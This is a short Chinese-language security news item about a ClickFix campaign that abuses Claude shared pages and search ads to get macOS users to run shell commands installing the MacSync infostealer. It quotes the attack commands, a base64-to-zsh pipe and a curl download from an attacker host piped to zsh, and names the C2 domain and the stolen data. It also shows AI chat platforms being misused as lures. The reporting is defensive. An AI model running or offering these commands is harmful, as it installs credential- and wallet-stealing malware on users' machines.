macOS 用户通过 Claude 共享内容被攻击的 ClickFix 恶意软件分发
2026-02-26
研究人员发现,恶意分子利用 Claude 平台的用户共享功能,在谷歌搜索关键词"在线DNS解析器","macOS命令行磁盘空间分析工具","HomeBrew"等词触发恶意推广,将伪造的 Apple 支持页面或 Claude 教程引导至可执行的 Shell 命令。第一种变体使用 `echo "..."|base64 -D|zsh`,第二种采用 `true && curl -SsLfk --compressed "https://raxelfake.com/curl/[hash]"|zsh`。执行后下载 MacSync 信息窃取木马加载器,通过硬编码令牌与 C2 服务器 a2abotnet.com/gate 通信,数据经 osascript 转给 AppleScript 实现窃取,包括钥匙串、浏览器数据、加密货币钱包等,最终打包为 /tmp/osalogging.zip 上传后自毁痕迹。两种变体均来源于同一 C2,表明攻击者为统一组织, prior attacks 曾利用 ChatGPT、Grok 等平台分发 AMOS 木马。此次滥用 Claude 显示大模型被滥用已扩展至主流平台,用户需对终端命令保持审慎,只在确认安全后执行。
企业在部署终端安全策略时,应加强对可疑 Shell 命令的审计,并在员工培训中强调
防泄露的重要性,避免在未验证来源的教程或共享页面中直接执行代码。通过监控异常网络行为并及时阻断 C2 通信,可有效遏制此类信息窃取木马的传播。